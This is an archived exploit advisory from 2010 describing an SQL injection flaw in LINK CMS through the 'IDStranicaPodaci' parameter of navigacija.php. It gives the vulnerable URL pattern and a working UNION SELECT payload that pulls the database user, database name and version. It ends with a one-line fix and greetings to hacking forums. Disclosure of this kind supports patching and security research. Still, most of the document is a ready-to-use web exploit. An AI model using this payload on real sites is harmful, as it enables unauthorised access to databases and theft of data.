LINK CMS SQL Injection Vulnerability

2010-08-23T00:00:00
ID 1337DAY-ID-13785
Type zdt
Reporter [email protected]
Modified 2010-08-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ====================================
LINK CMS SQL Injection Vulnerability
====================================

# Exploit Title: LINK CMS.SQL Injection Vulnerability
# Date: 2010-08-23
# Author: [email protected]
# Software Link:
http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1
# Version: n/a


####################################################################
.:. Author : [email protected]
.:. Contact: [email protected], [email protected](MSN)
.:. Home : www.evilzone.org, www.pentesting-rs.org
.:. Script : LINK CMS
.:. Bug Type : Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
 ####################################################################

===[ Exploit ]===

.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]

===[ Example ]===

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--


===[ Solution ]===

.:. Input validation of "IDStranicaPodaci" parameter should be corrected.


Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-))



#  0day.today [2018-02-15]  #